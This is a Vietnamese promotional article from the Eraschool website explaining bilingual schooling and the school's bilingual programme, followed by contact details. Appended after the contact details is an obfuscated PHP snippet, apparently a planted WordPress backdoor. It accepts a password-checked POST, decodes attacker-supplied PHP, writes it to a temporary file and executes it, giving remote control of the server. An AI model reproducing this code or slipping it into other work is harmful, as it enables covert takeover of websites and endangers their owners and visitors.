Trường song ngữ là gì? Eraschool có chương trình song ngữ không?

post

Trường song ngữ là gì mà nhiều ba mẹ muốn con mình theo học đến thế? Hệ chương trình này khác gì so với hệ thường và Eraschool có đào tạo song ngữ hay không? Tất cả sẽ được giải đáp ngay dưới bài viết này, mời ba mẹ cùng theo dõi nhé!  

Khái niệm trường song ngữ là gì?

Trường song ngữ là gì? Đây là thuật ngữ chỉ trường áp dụng cách dạy và học sử dụng song song 2 ngôn ngữ. Các trường học sẽ dạy song song giữa tiếng mẹ đẻ của nước đó cùng với ngôn ngữ phổ biến khác như tiếng Anh, tiếng Hàn, tiếng Pháp, tiếng Đức… Ở Việt Nam, thông thường các trường song ngữ sẽ dạy tiếng Việt và tiếng Anh. 

Các giờ học cùng giáo viên nước ngoài sẽ giúp con tự tin sử dụng ngôn ngữ
Các giờ học cùng giáo viên nước ngoài sẽ giúp con tự tin sử dụng ngôn ngữ

Điểm khác biệt duy nhất giữa chương trình quốc tế và song ngữ là thời lượng sử dụng tiếng Anh trong thời gian học tập. Giáo trình của chương trình song ngữ sẽ bao gồm cả tiếng Anh và tiếng Việt dựa trên khung chương trình Giáo dục Phổ thông Quốc gia. Bên cạnh đó, học sinh theo học hệ song ngữ có thể thi lấy các chứng chỉ tiếng Anh quốc tế. 

Eraschool có chương trình học song ngữ không?

Có, Eraschool có đào tạo chương trình học song ngữ. Như khái niệm trường song ngữ là gì đã được nêu ở trên, hệ song ngữ của trường Eraschool sẽ đào tạo song song cả tiếng Việt và tiếng Anh. Thời lượng tiếng Anh của hệ này là 10 tiết/tuần và 40% thời lượng đó là học với giáo viên nước ngoài. 

Hệ song ngữ của Eraschool dạy cấp tiểu học đến trung học cơ sở
Hệ song ngữ của Eraschool dạy cấp tiểu học đến trung học cơ sở

Hệ song ngữ trường Eraschool thiết kế giáo trình dạy học dựa trên khung chương trình chuẩn Giáo dục Phổ thông kết hợp với chương trình Cambridge. Chương trình học này giúp học sinh có thể đạt được chứng chỉ Quốc tế và sử dụng tiếng Anh thuần thục như một ngôn ngữ thứ hai. Với các em học sinh theo học hệ song ngữ của trường, sau khi kết thúc có thể đạt được chứng chỉ như sau: 

  • Bậc tiểu học: Có thể đạt chứng chỉ Flyers của Cambridge
  • Bậc Trung học cơ sở: Học sinh đạt trình độ B1 theo khung tham chiếu Châu Âu (CEFR) thì có thể thi lấy chứng chỉ tiếng Anh quốc tế. 

Giới thiệu về mô hình trường

Cảnh quan ngôi trường được gọi là “bản giao hưởng hạnh phúc” 
Cảnh quan ngôi trường được gọi là “bản giao hưởng hạnh phúc”

Ở khu vực Mê Linh – Hà Nội, Eraschool được gọi là ngôi trường tiểu học chất lượng cao top đầu ở đây. Eraschool được xây dựng theo mô hình “trường liên cấp” – tức là có nhiều cấp học từ tiền tiểu học đến trung học cơ sở. Học sinh theo học tại Eraschool không cần lo lắng tìm trường mỗi khi chuyển cấp, đồng thời luôn được học trong môi trường có triết lý giáo dục thống nhất. 

Học sinh của Eraschool được học tập và kết nối với thiên nhiên mỗi ngày
Học sinh của Eraschool được học tập và kết nối với thiên nhiên mỗi ngày

Mô hình trường học sinh thái của Eraschool mang lại rất nhiều điểm ưu việt cho sự phát triển của các con. Tại đây, tất cả hoạt động dạy và học đều thông qua việc trải nghiệm thực tế trong thiên nhiên gắn liền giáo dục sáng tạo. Với quan niệm giáo dục tổ chức sự trưởng thành cho trẻ, Eraschool chính là môi trường học tập lý tưởng để trẻ phát triển toàn diện về lối sống, trí tuệ, thể chất, thẩm mỹ cũng như có ý thức tham gia các hoạt động xanh, có ý thức về các giá trị văn hóa của dân tộc và sự đa dạng văn hóa trong cộng đồng quốc tế.

Dù ba mẹ cho con theo học mô hình trường học nào, chương trình nào thì Eraschool đều mong ba mẹ có quyết định chính xác với nhu cầu của mình và khả năng của các con. Nội dung trường song ngữ là gì đã được nêu chi tiết trong bài viết, nếu ba mẹ cần thêm thông tin gì vui lòng liên hệ hotline 0899 889 818 để được tư vấn chính xác nhất. 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}